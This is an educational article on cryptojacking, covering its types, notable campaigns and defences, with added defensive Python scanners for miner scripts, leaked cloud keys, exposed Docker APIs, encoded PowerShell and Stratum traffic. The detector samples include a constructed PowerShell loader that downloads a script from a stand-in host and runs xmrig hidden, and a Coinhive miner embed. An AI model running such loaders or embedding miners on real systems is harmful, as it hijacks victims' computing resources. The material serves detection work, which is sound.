To understand the mechanism of cryptojacking and how to prevent it, let’s take a look at the following topics.
The motivation behind cryptojacking is straightforward: money. Cryptocurrency mining can be lucrative, but turning a profit is hard when the miner has to pay for the hardware and the electricity. For anyone with limited resources and fewer scruples, cryptojacking is an effective, inexpensive way to mine coins, because the victims pay those costs.
What is Cryptojacking?
Cryptojacking is the unauthorized use of other people’s devices to mine cryptocurrency. Unlike most other cybercrimes, it is designed to stay hidden from the victim: the mining code embeds itself on a device and quietly consumes its CPU, GPU, and electricity, and the only thing the attacker takes is computing time. To understand the process, let’s first briefly revisit how cryptocurrency mining works.
Cryptocurrency is digital money that exists as tokens or “coins” on a shared ledger. Thousands of cryptocurrencies exist; the best known is Bitcoin, and the one most cryptojackers mine is Monero, because it is designed for privacy and can be mined efficiently on ordinary CPUs. While most remain purely virtual, some cryptocurrencies have reached the physical world through payment cards and similar projects.
Cryptocurrencies record transactions in a distributed ledger known as a blockchain. Every participating node holds a copy, and the copies are updated as new transactions are confirmed.
Recent transactions are grouped into a ‘block’. In proof-of-work systems such as Bitcoin and Monero, a block is only accepted once someone finds a nonce that makes the hash of the block header fall below a network-set target, which can only be done by trying enormous numbers of candidates. Each accepted block includes the hash of the previous one, so the data is linked, or “chained”, together chronologically, and altering an old block would invalidate every block after it.
To produce new blocks, proof-of-work cryptocurrencies depend on participants supplying computing power. Whoever finds a valid block is rewarded with newly issued coins plus transaction fees. Those who trade computing resources for this reward are known as miners.
For the larger cryptocurrencies, mining is done by teams running dedicated rigs of specialised hardware to perform the hashing. This consumes a significant amount of electricity; estimates of the Bitcoin network’s annual consumption have exceeded 73 TWh. Those electricity and hardware costs are exactly what a cryptojacker offloads onto victims.
Types of Cryptojacking
There is more than one way for cryptojackers to mine illicitly: malware that drops a miner onto the victim’s machine, mining scripts that run inside the victim’s web browser, and stolen credentials that let the attacker run miners on someone else’s cloud account.
File-based Cryptojacking
File-based cryptojacking delivers the miner as an executable that is downloaded and run on the victim’s machine. Once running on one host, the miner may spread to others across the network. One of the most common delivery methods is malicious email.
The victim receives an email with a legitimate-looking attachment or link. Opening it runs a loader that installs the mining software, which then runs in the background, typically throttled and disguised as a system process, so the user does not notice.
Browser-based Cryptojacking
Cryptojacking can also take place directly inside a web browser. In this variant nothing is installed: the mining code runs as JavaScript (often with a WebAssembly core) in the page, and the visitor’s CPU does the work for as long as the tab stays open.
Attackers write or license a mining script and embed it in as many pages as they can reach. Common placements are malicious ads delivered through ad networks, and pages on sites compromised through vulnerable or out-of-date WordPress plugins. The script starts automatically when the page loads and usually throttles itself so that fan noise and slowdown are not obvious.
Cryptojacking can also arrive through a supply-chain attack, where a third-party JavaScript library that many sites load is compromised and the mining code is added to it, so every site including that library starts mining on its visitors.
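The following scanner is an added example, not code from the original article or from any vendor: it looks for the indicators described above in a page’s HTML, namely a script loaded from a historical browser-mining domain, a Coinhive-style API call, a WebAssembly module paired with a Web Worker, a Stratum pool endpoint, and a hard-coded Monero address. The domain list, sample pages, site key, pool host, and wallet are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Domains of historical browser-mining services that appear on public
# blocklists. Illustrative, not a maintained list.
MINER_SCRIPT_HOSTS = ("coinhive.com", "coin-hive.com", "crypto-loot.com", "jsecoin.com")

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc=[\"']([^\"']+)[\"']", re.I)
COINHIVE_API_RE = re.compile(r"\bCoinHive\.(?:Anonymous|User|Token)\s*\(")
WASM_RE = re.compile(r"\bWebAssembly\.(?:instantiate|instantiateStreaming|compile|Module)\b")
WORKER_RE = re.compile(r"\bnew\s+Worker\s*\(")
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://[\w.\-]+:\d+")
# Standard Monero addresses are 95 base58 characters starting with '4'.
MONERO_ADDR_RE = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")


def scan_page(html: str) -> list:
    """Return a list of human-readable findings for one page's HTML."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = (urlparse(src).hostname or "").lower()
        if any(host == h or host.endswith("." + h) for h in MINER_SCRIPT_HOSTS):
            findings.append(f"script loaded from known miner host: {host}")
    if COINHIVE_API_RE.search(html):
        findings.append("Coinhive miner API call in inline script")
    # WebAssembly plus a Web Worker is how in-browser miners keep hashing off
    # the main thread. Legitimate apps do this too, so it is a weak signal on
    # its own and should be combined with the others.
    if WASM_RE.search(html) and WORKER_RE.search(html):
        findings.append("WebAssembly module instantiated alongside a Web Worker")
    for endpoint in STRATUM_RE.findall(html):
        findings.append(f"Stratum pool endpoint in page: {endpoint}")
    for addr in MONERO_ADDR_RE.findall(html):
        findings.append(f"Monero address embedded in page: {addr[:6]}...")
    return findings


# Constructed sample pages. The site key, pool host and wallet are placeholders.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example.com/app.js"></script>
<script>document.getElementById('x').textContent = 'hello';</script>
</head><body></body></html>"""

FAKE_WALLET = "4" + "A" * 94  # constructed: correct shape, not a real address
INFECTED_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
<script>
  const worker = new Worker('miner-worker.js');
  WebAssembly.instantiate(wasmBytes).then(m => worker.postMessage(m));
  const pool = "stratum+tcp://pool.example.invalid:3333";
  const wallet = "WALLET_PLACEHOLDER";
</script>
</head><body></body></html>""".replace("WALLET_PLACEHOLDER", FAKE_WALLET)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_page(page))
```

These are heuristics: a legitimate WebAssembly application will trip the Worker rule, and a miner served from a fresh domain with its strings obfuscated will slip past the host and regex rules. In practice they are combined with blocklists and with CPU-usage telemetry from the browser itself.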
Cloud Cryptojacking
In cloud cryptojacking, attackers search source code, configuration files, and public repositories for an organization’s cloud API keys and use them to access its cloud account. They then spin up as much compute as the account allows and run miners on it, leaving the victim with an enormous bill. Because cloud capacity is effectively unlimited, this scales the attacker’s mining far beyond what individual infected machines could deliver.
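Attackers find these keys with exactly the kind of scan a defender can run before code is committed. The scanner below is an added example, not the article’s or any cloud provider’s code: it matches credential formats that have a documented fixed prefix (AWS access key IDs, Google API keys) and flags assignments to secret-looking variable names whose values have high Shannon entropy. The sample file is constructed, and the AWS values in it are the placeholder credentials from AWS’s own documentation.

```python
import math
import re
from collections import Counter

# Credential formats with documented fixed prefixes. A real scanner carries
# many more; these two are enough to show the approach.
KEY_PATTERNS = {
    "AWS access key ID": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "Google API key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
}

# Assignments whose variable name suggests a secret; the value is judged by entropy.
ASSIGNMENT_RE = re.compile(
    r"(?i)\b([a-z0-9_]*(?:secret|token|password|passwd|api_key|apikey)[a-z0-9_]*)"
    r"\s*[:=]\s*[\"']([^\"']{16,})[\"']"
)
ENTROPY_THRESHOLD = 3.5  # bits per character; random base64 is ~6, English text ~4


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    return value[:4] + "..." + value[-2:]


def scan_source(text: str) -> list:
    """Scan text line by line; return dicts with line number, kind and a redacted value."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in KEY_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append({"line": line_no, "kind": kind, "value": redact(m.group(0))})
        for m in ASSIGNMENT_RE.finditer(line):
            name, value = m.group(1), m.group(2)
            # Template values such as REPLACE_ME have low entropy and are skipped;
            # real secrets are close to random and score well above the threshold.
            if shannon_entropy(value) >= ENTROPY_THRESHOLD:
                findings.append({
                    "line": line_no,
                    "kind": f"high-entropy value assigned to {name}",
                    "value": redact(value),
                })
    return findings


# Constructed sample. The AWS values are the placeholder credentials from AWS's
# own documentation; the password is a low-entropy template value.
SAMPLE_SOURCE = """\
# settings.py (constructed for this example)
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
db_password = "REPLACE_ME_REPLACE_ME"
region = "eu-west-1"
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"line {f['line']}: {f['kind']} ({f['value']})")
```

Run it as a pre-commit hook or in CI, and treat any hit as a key to rotate, not just to delete: once a key has been pushed to a public repository, assume it has been harvested. Dedicated tools such as gitleaks and trufflehog implement the same two ideas with far larger pattern sets.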
How does Cryptojacking work?
Here are the mechanics and steps involved in the cryptojacking process:
1. Compromising an asset: the attacker gets mining code onto something the victim will run or visit, such as a website, an ad, an email attachment, or an exposed server.
2. Executing the script: the attacker then waits for a victim to trigger it. Opening the attachment, clicking the link, or browsing to a page carrying the infected ad executes the mining code.
3. Mining begins: the miner runs in the background without the user’s knowledge, usually throttled to a fraction of the CPU so that the slowdown is not obvious.
4. Hashing: the miner repeatedly hashes candidate blocks looking for a solution that meets the network’s difficulty target. In practice the miner joins a mining pool and submits partial solutions (“shares”) to it rather than trying to find whole blocks alone.
5. Receiving the reward: the pool pays the attacker’s wallet in proportion to the shares submitted. The attacker bears none of the hardware or electricity costs, and because the payout is usually in a privacy coin such as Monero, it is hard to trace.
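To make step 4 concrete, and the “complex mathematical process” behind block creation described earlier, here is a minimal proof-of-work chain. It is an added example written for this article, not code from any real cryptocurrency: the block format is simplified, the difficulty is a count of leading zero hex digits rather than a compact target, and the transactions are constructed sample data. The brute-force loop in mine() is the work a cryptojacker steals.

```python
from __future__ import annotations

import hashlib
import json
from dataclasses import dataclass, asdict, field


@dataclass
class Block:
    """Simplified block: real headers carry more fields (version, Merkle
    root, timestamp, compact target) and Bitcoin hashes them twice."""
    index: int
    previous_hash: str
    transactions: list = field(default_factory=list)
    nonce: int = 0

    def serialize(self) -> bytes:
        # Deterministic serialisation so identical blocks always hash identically.
        return json.dumps(asdict(self), sort_keys=True).encode()

    def hash(self) -> str:
        return hashlib.sha256(self.serialize()).hexdigest()


def meets_target(block_hash: str, difficulty: int) -> bool:
    # Difficulty = number of leading hex zeros required; each extra zero makes
    # the expected number of attempts 16 times larger.
    return block_hash.startswith("0" * difficulty)


def mine(block: Block, difficulty: int, max_attempts: int = 10_000_000) -> int:
    """Brute-force the nonce until the block hash meets the target.

    Returns the number of hashes tried. This loop, repeated billions of times
    on stolen hardware, is the entire product of a cryptojacking operation.
    """
    for attempts in range(1, max_attempts + 1):
        block.nonce = attempts
        if meets_target(block.hash(), difficulty):
            return attempts
    raise RuntimeError("no valid nonce found within max_attempts")


def verify(block: Block, difficulty: int) -> bool:
    # Verification costs one hash, whereas mining costs ~16**difficulty hashes.
    # That asymmetry is what makes proof of work a usable lottery.
    return meets_target(block.hash(), difficulty)


def build_demo_chain(difficulty: int = 3) -> list[Block]:
    """Mine a two-block chain on constructed sample transactions."""
    genesis = Block(0, "0" * 64, [{"from": "coinbase", "to": "alice", "amount": 50}])
    mine(genesis, difficulty)
    block1 = Block(1, genesis.hash(), [{"from": "alice", "to": "bob", "amount": 5}])
    mine(block1, difficulty)
    return [genesis, block1]


if __name__ == "__main__":
    chain = build_demo_chain(4)
    for b in chain:
        print(f"block {b.index}: nonce={b.nonce} hash={b.hash()}")
```

Raising the difficulty by one multiplies the running time by roughly sixteen, which is why real networks need warehouses of hardware and why a single hijacked laptop only pays off when the attacker controls thousands of them and pools their shares.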
Cryptojacking History
Cryptojacking came to widespread attention in September 2017, during that year’s cryptocurrency boom, when Coinhive released a JavaScript library that let website owners mine Monero in visitors’ browsers as an alternative to advertising revenue. The library was immediately misused: criminals embedded it in compromised sites and ads without anyone’s consent, and visitors’ computers mined Monero for them. Coinhive shut down in March 2019, but the technique it popularised did not go away.
The Rise and Effects of Cryptojacking
Cryptojacking has become a serious global problem. Cybercriminals want to turn access to computer systems into money with minimal risk and effort, and they keep finding new ways to steal computing resources for mining.
In early 2018, attackers placed mining scripts in ads served on YouTube through Google’s DoubleClick network, so visitors mined Monero simply by watching videos, with no click required.
Mobile devices are targets too. A single phone has little processing power, but a large number of infected phones adds up to enough hashing to be worth the cryptojackers’ attention. Some security practitioners point out that, unlike many other types of malware, cryptojacking scripts do not destroy or steal the victim’s data. They do have consequences, though: degraded performance, higher electricity use, extra heat, and shortened battery and hardware life.
For an organization, as opposed to an individual hit by a drive-by script, the costs are concrete: IT staff time spent investigating slow systems, higher electricity bills, inflated cloud invoices, and work that the affected systems failed to get done.
Cryptojacking is growing because the tooling is easy to deploy and hard to detect, and it requires little technical skill. Ready-made mining kits are sold on underground markets, and once installed the miner can run in the background of an infected machine for months before anyone looks.
Even when cryptojacking is detected, tracing it back to the operator is difficult: the wallet address in the miner’s configuration is usually for a privacy coin such as Monero, and by the time the infection is found the proceeds have often already been cashed out. The victim is left with the remediation cost and the resources that were consumed.
Real-world Cryptojacking Examples
Cryptojackers can be inventive when it comes to getting onto other people’s computers. Most of their techniques are borrowed from other malware families such as ransomware and adware. Following are some real-world examples:
Exploitation of Microsoft Exchange vulnerabilities by the Prometei cryptocurrency botnet
Prometei is a modular, multi-stage botnet used to mine Monero. In early 2021, Cybereason reported that the botnet was exploiting the recently disclosed Microsoft Exchange Server vulnerabilities to gain a foothold, then using the infected machines to mine Monero.
Windows credentials stolen by spear-phishing PowerGhost
PowerGhost first uses spear-phishing to gain access to a system, then steals Windows credentials and spreads laterally using the EternalBlue exploit and Windows Management Instrumentation. It is fileless, living in PowerShell and the registry rather than on disk, and it attempts to disable antivirus software as well as any competing crypto miners.
Graboid spread using containers
Graboid is a cryptojacking botnet with self-spreading capability, making it the first known cryptojacking worm to spread through Docker containers. It propagates by finding Docker Engine deployments whose API is exposed to the internet without authentication, then uses that API to start a malicious container. It is estimated that over 2,000 deployments were infected.
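The misconfiguration Graboid exploited is visible in one file. The audit below is an added example, not the article’s or Docker’s code: it reads a daemon.json, finds any tcp:// listener, and reports it as critical when it is bound to a non-loopback address without tlsverify, since the Docker API grants root-equivalent control of the host to anyone who can connect. The three configurations are constructed; the second shows the hardened equivalent.

```python
import json
from urllib.parse import urlparse

LOOPBACK = ("127.0.0.1", "localhost", "::1")
TLS_FILES = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(config_text: str) -> list:
    """Audit a Docker daemon.json. Returns (severity, message) tuples."""
    cfg = json.loads(config_text)
    findings = []
    tls_verify = bool(cfg.get("tlsverify", False))
    for host in cfg.get("hosts", []):
        url = urlparse(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// listeners are reachable only from the host
        bind = (url.hostname or "").lower()
        if bind in LOOPBACK:
            findings.append(("INFO", f"{host}: TCP API bound to loopback only"))
            continue
        if not tls_verify:
            findings.append(("CRITICAL",
                f"{host}: Docker API reachable over the network with no authentication; "
                "anyone who can connect can start a privileged container and own the host"))
        else:
            # tlsverify without the certificate files means the daemon will not
            # start with that listener, or has been pointed at defaults by accident.
            missing = [k for k in TLS_FILES if not cfg.get(k)]
            if missing:
                findings.append(("HIGH", f"{host}: tlsverify is set but {', '.join(missing)} missing"))
    return findings


# Constructed daemon.json examples. The first is the kind of configuration
# Graboid scanned for; the second is the hardened equivalent.
EXPOSED_CONFIG = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

HARDENED_CONFIG = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

LOCAL_ONLY_CONFIG = """{"hosts": ["tcp://127.0.0.1:2375"]}"""

if __name__ == "__main__":
    for name, cfg in (("exposed", EXPOSED_CONFIG), ("hardened", HARDENED_CONFIG),
                      ("local-only", LOCAL_ONLY_CONFIG)):
        print(name, audit_daemon_config(cfg))
```

Even the hardened form only moves the problem to protecting the client certificate, which is itself root on the host. Where remote access is needed at all, restrict the port at the firewall to known management addresses, or avoid the TCP listener entirely and reach the daemon over SSH.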
Monero mined by malicious Docker Hub accounts
In June 2020, a cryptojacking scheme was identified that used images hosted on Docker Hub to deliver mining software to victims’ systems. Because the miner ships inside an ordinary-looking container image, pulling and running it looks like normal activity. The infected images were pulled more than two million times, and the proceeds were estimated at around $36,000.
MinerGate variant
A variant of the MinerGate malware family has an interesting feature: it detects mouse movement and suspends mining while the user is active. This prevents victims from being tipped off by a sudden drop in performance while they are working.
BadShell using Windows processes
Comodo Cybersecurity found malware on a client’s system that used legitimate Windows components to mine cryptocurrency. BadShell uses:
- a PowerShell script to inject the malware code into an existing running process
- Task Scheduler for persistence
- the registry to hold the malware’s binary, so nothing suspicious sits on disk
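The BadShell pattern of PowerShell plus a scheduled task leaves a trace in process-creation telemetry: a powershell.exe command line carrying a base64 -EncodedCommand, often created by schtasks.exe. The analyser below is an added example, not Comodo’s or the article’s code. It decodes the payload (PowerShell base64-encodes the script as UTF-16LE) and checks both the outer command line and the decoded script for mining and loader indicators. The three command lines are constructed, with example.invalid as the download host.

```python
import base64
import binascii
import re

# Strings that point at mining or at the loader tricks BadShell-style
# malware uses. Matched case-insensitively against the decoded command.
INDICATORS = (
    "stratum+tcp", "xmrig", "minerd", "cryptonight", "randomx",
    "invoke-expression", "iex ", "downloadstring", "frombase64string",
    "-windowstyle hidden", "-w hidden",
)

# powershell.exe accepts several abbreviations of -EncodedCommand.
ENCODED_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell encodes the script as UTF-16LE before base64-encoding it.
    return raw.decode("utf-16-le", errors="replace")


def analyze_cmdline(cmdline: str) -> dict:
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline.lower() + " " + (decoded or "").lower()
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "hits": [i for i in INDICATORS if i in haystack],
    }


def _encode(ps_script: str) -> str:
    # Used only to build the constructed samples below, the same way an
    # attacker (or an administrator) prepares an -EncodedCommand argument.
    return base64.b64encode(ps_script.encode("utf-16-le")).decode("ascii")


MINER_LOADER = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1'); "
    "Start-Process xmrig.exe -ArgumentList '-o stratum+tcp://pool.example.invalid:3333' "
    "-WindowStyle Hidden"
)

# Constructed process-creation records, as an EDR or Sysmon export might show them.
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + _encode(MINER_LOADER),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    'schtasks.exe /Create /SC ONLOGON /TN "Updater" /TR "powershell -enc ' + _encode("Get-Date") + '"',
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        r = analyze_cmdline(c)
        print(f"encoded={r['encoded']} hits={r['hits']}")
```

An encoded command with no indicator hits, as in the third sample, is still worth a look when it arrives inside a scheduled task: administrators rarely need to hide a Get-Date call, and the indicator list only catches what it was written for.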
Rogue employee commandeering company systems
A European bank noticed unusual traffic patterns on its servers. Night-time batch processes were slow, yet the diagnostic tools found nothing out of the ordinary. A physical inspection of the data center turned up a crypto mining rig under the floorboards, set up by a rogue member of staff.
Crypto mining using GitHub
Cryptojackers have used GitHub to host crypto-mining malware. They fork legitimate projects, hide the malware in the forked project’s directory structure, and then use phishing to lure people into downloading it.
Exploiting rTorrent vulnerability
Cryptojackers discovered a misconfiguration in rTorrent deployments: some clients exposed their XML-RPC interface without authentication. Attackers used it to run commands on the exposed clients and deploy a Monero miner.
Facexworm: Malicious Chrome extension
Facexworm is a malicious Google Chrome extension that spreads through links sent from compromised Facebook Messenger accounts. Initially it delivered adware; later versions targeted cryptocurrency exchanges and delivered crypto-mining code. It can also steal web account credentials and inject cryptojacking code into web pages the victim visits.
WinstarNssmMiner: Scorched earth policy
Dubbed WinstarNssmMiner, this quick-spreading miner crashes the computer of anyone who tries to remove it. It launches an svchost.exe process, injects its code into it, and marks that process as critical. Because Windows treats the termination of a critical process as a fatal error, killing the miner triggers a blue-screen crash.
CoinMiner destroying competitors
Some miners are designed to find and kill competing miners already running on the systems they infect. CoinMiner is one example: it checks for an AMDDriver64 process on Windows systems, and it carries two lists, $malwares and $malwares2, of process names belonging to other crypto miners, which it then terminates.
Compromised MikroTik routers spread cryptominers
Researchers counted over 80 cryptojacking campaigns targeting MikroTik routers, and a large number of devices were compromised. The campaigns exploited CVE-2018-14847, a known vulnerability for which MikroTik had already released a patch. Because these routers sit in front of many users, a single compromised device let the attackers inject mining scripts into the web traffic of everyone behind it.
How to prevent Cryptojacking?
Detecting cryptojacking after the fact is difficult, so preventive measures are the better investment. The following protect workstations, networks, and cloud accounts:
Training IT Teams
IT and security teams should know what cryptojacking looks like: sustained high CPU or GPU utilisation with no obvious cause, unfamiliar processes, outbound connections to mining pools, unexplained jumps in cloud spend, and machines running hotter or louder than usual. Recognising these signs early lets them start an investigation before the miner has run for months.
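Of those signs, the outbound pool connection is the most reliable to automate, because miners talk a distinctive protocol. Stratum is newline-delimited JSON-RPC: Bitcoin-style pools use methods prefixed mining., and Monero pools (as used by XMRig) expect a login message whose params carry agent and algo fields. The classifier below is an added example, not the article’s or any vendor’s code; it runs over constructed flow records (destination, port, and the first bytes of the TCP payload) and uses well-known pool ports only as a weak supporting signal.

```python
import json

# Stratum v1 (Bitcoin-style) methods and the Monero/XMRig JSON-RPC login shape.
STRATUM_V1_PREFIX = "mining."
MONERO_LOGIN_KEYS = {"agent", "algo"}  # XMRig sends these in its login params
COMMON_POOL_PORTS = {3333, 4444, 5555, 7777, 9999, 14444}
MINER_AGENTS = ("xmrig", "cpuminer", "ccminer", "minerd", "xmr-stak")


def parse_json_lines(payload: str) -> list:
    """Stratum is newline-delimited JSON; skip anything that does not parse."""
    messages = []
    for line in payload.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict):
            messages.append(obj)
    return messages


def classify_flow(flow: dict) -> dict:
    """flow = {"dst": ip, "dport": int, "payload": first bytes of the TCP stream as text}"""
    reasons = []
    strong = False
    for msg in parse_json_lines(flow.get("payload", "")):
        method = str(msg.get("method", ""))
        params = msg.get("params")
        if method.startswith(STRATUM_V1_PREFIX):
            strong = True
            reasons.append(f"Stratum v1 method {method}")
        elif method == "login" and isinstance(params, dict) and MONERO_LOGIN_KEYS & set(params):
            strong = True
            reasons.append("Monero-style stratum login with agent/algo fields")
        # The client advertises itself in params.agent (Monero) or params[0] (mining.subscribe).
        agent = str(params.get("agent", "")) if isinstance(params, dict) else ""
        if not agent and isinstance(params, list) and params:
            agent = str(params[0])
        if any(a in agent.lower() for a in MINER_AGENTS):
            strong = True
            reasons.append(f"miner user agent: {agent}")
    if flow.get("dport") in COMMON_POOL_PORTS:
        reasons.append(f"destination port {flow['dport']} is commonly used by mining pools")
    return {"is_stratum": strong, "reasons": reasons}


# Constructed flow records; addresses are from documentation ranges and the
# wallet is a placeholder. The third is an ordinary JSON-RPC login, included
# to show that the method name alone is not enough.
SAMPLE_FLOWS = [
    {"dst": "198.51.100.7", "dport": 3333, "payload":
        '{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}\n'
        '{"id": 2, "method": "mining.authorize", "params": ["WALLET_PLACEHOLDER.worker1", "x"]}\n'},
    {"dst": "203.0.113.9", "dport": 14444, "payload":
        '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER",'
        '"pass":"x","agent":"XMRig/6.18.0","algo":["rx/0"]}}\n'},
    {"dst": "192.0.2.10", "dport": 443, "payload":
        '{"id": 1, "jsonrpc": "2.0", "method": "login", "params": {"user": "alice", "password": "hunter2"}}\n'},
    {"dst": "192.0.2.11", "dport": 80, "payload": "GET /index.html HTTP/1.1\r\nHost: intranet.example\r\n\r\n"},
]

if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        print(f["dst"], f["dport"], classify_flow(f))
```

Pools increasingly accept TLS (stratum+ssl), which hides the payload from this kind of inspection; when that is the case, fall back to destination reputation, unusual long-lived connections to the ports above, and host-side telemetry such as a process pinned at high CPU for hours.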
Educating Employees
IT teams often learn about infections only because an employee mentions that a machine is slow, hot, or loud, so employees should know that these symptoms can indicate a compromise and are worth reporting. They should also be taught not to open attachments or links in unexpected emails, whether on a work or personal account.
Making Use of Anti-Cryptomining Extensions
Browser extensions can keep cryptominers at bay. Since the browser is a favourite delivery platform for cryptojacking scripts, an anti-mining extension is worthwhile; Anti-Miner, MinerBlock, and No Coin are examples. Be aware that most of them work from blocklists of known mining domains and scripts, so a miner served from a new domain or with obfuscated code may get through.
Using Ad-Blockers
Web ads are another common carrier for cryptojacking scripts, so an ad blocker is a useful preventive measure: it stops many malicious ads from loading at all, and many ad blockers also include lists of known mining scripts. Like the dedicated extensions, it only blocks what is on its lists.
Disabling JavaScript
Disabling JavaScript while browsing prevents browser-based mining scripts from running at all. Bear in mind that it also breaks much of the functionality that modern sites depend on, so a more practical approach is to allow JavaScript only on sites you trust.
Key Takeaways
Like other forms of cybercrime, the motive for cryptojacking is profit. Unlike most threats, though, it is designed to stay undetected, using just enough of the system’s resources to avoid attracting attention. Be alert when a system is not operating smoothly: often the only noticeable signs are slower performance, fans running hard, unexplained heat, or a cloud bill that has suddenly jumped.